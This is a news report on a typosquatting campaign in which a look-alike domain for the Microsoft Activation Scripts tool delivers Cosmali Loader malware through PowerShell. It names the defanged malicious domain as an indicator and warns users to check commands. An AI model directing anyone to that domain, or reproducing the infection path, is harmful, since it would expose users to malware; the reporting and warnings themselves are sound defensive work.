Khaberni - Recent security reports have revealed the exploitation of a fake electronic domain, very similar to the domain of the famous Microsoft Activation Scripts (MAS) tool, to spread malware targeting Windows systems via PowerShell commands, in an attack that relies on a simple spelling mistake that users could make.
According to "BleepingComputer", a number of MAS tool users have started reporting unexpected warning messages on their devices on the "Reddit" platform, indicating that they have been infected with a malware known as Cosmali Loader.
A fake domain one letter off
The investigations clarified that the attackers created a fake domain: get.activate[.]win.
It mimics the official domain used in the MAS instructions which is: get.activated.win.
The difference between the two domains is just one letter, which makes users susceptible to falling into the trap when manually typing the command inside PowerShell.
Once the wrong command is executed, malicious scripts are loaded that infect the system.
Mining and spyware
The security researcher known as RussianPanda confirmed that the notifications that appeared to the users are related to the open-source Cosmali Loader malware, noting that it had been previously used to download cryptocurrency mining tools, as well as a remote control Trojan known as XWorm RAT.
He also suggested that the warning messages were sent from within the malware’s control panel after a security researcher accessed it, aiming to alert victims to their devices being hacked.
Warnings from MAS developers
The operators of the MAS project, hosted on GitHub, warned users about this campaign and urged them to check commands carefully before executing them, and to avoid manually rewriting commands to prevent falling into the trap of fake domains.
The experts advised not to run any remote code programmatically without a full understanding of its function and tested inside an isolated environment (Sandbox), especially since unofficial Windows activation tools have been and still are a common means for spreading malware.
Risks of unofficial activation tools
Although MAS is an open-source project, "Microsoft" classifies it as a hacking tool that circumvents its licensing system.
Cybersecurity experts confirm that using such tools exposes users to significant risks, possibly leading to full loss of control over their devices.
A single wrong letter was enough to breach thousands of devices, and with the increasing attacks based on fake domains, caution and verification of command and software sources remain the first line of defense against these digital threats.
